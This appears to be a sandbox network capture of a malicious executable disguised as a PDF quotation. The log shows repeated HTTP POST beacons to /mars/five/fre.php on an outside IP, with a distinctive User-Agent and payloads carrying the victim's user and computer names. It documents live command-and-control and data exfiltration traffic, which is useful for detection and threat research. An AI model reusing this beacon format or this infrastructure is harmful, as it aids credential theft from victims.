Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:00.792104959 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 176 Connection: close
Jan 7, 2025 12:32:00.796955109 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones134349JONES-PCk0FDD42EE188E931437F4FBE2CUj5TF
Jan 7, 2025 12:32:01.519831896 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:01.749722958 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 176 Connection: close
Jan 7, 2025 12:32:01.754698992 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones134349JONES-PC+0FDD42EE188E931437F4FBE2CSvQPc
Jan 7, 2025 12:32:02.466386080 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:02.545078993 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:02.549907923 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:03.274969101 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:03.597286940 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:03.602113962 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:04.338901043 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:04.485605955 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:04.490437984 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:05.248064995 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:05.407216072 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:05.412187099 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:07.009295940 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Jan 7, 2025 12:32:07.009385109 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Jan 7, 2025 12:32:07.009649038 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:07.182356119 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:07.187246084 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:07.934948921 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:08.078979969 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:08.083803892 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:08.818167925 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:08.969996929 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:08.974834919 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:09.731591940 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:10.068161011 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:10.073415041 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:10.792685986 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:11.218591928 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:11.223372936 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:11.917833090 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:12.112540960 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:12.117367983 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:12.853677034 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:12.999502897 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:13.004316092 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:13.756208897 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:13.924335957 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:13.932697058 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:14.646960020 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:14.800632954 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:14.805464983 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:15.593087912 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49758	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:15.764664888 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:15.769592047 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:16.533528090 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49759	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:16.689625978 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:16.694494009 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:17.444952011 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49760	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:17.616255999 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:17.621098995 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:18.365715981 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49761	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:18.519838095 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:18.524599075 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:19.255095005 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49762	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:19.408777952 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:19.413561106 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:20.161349058 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49763	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:20.314740896 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:20.319720030 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
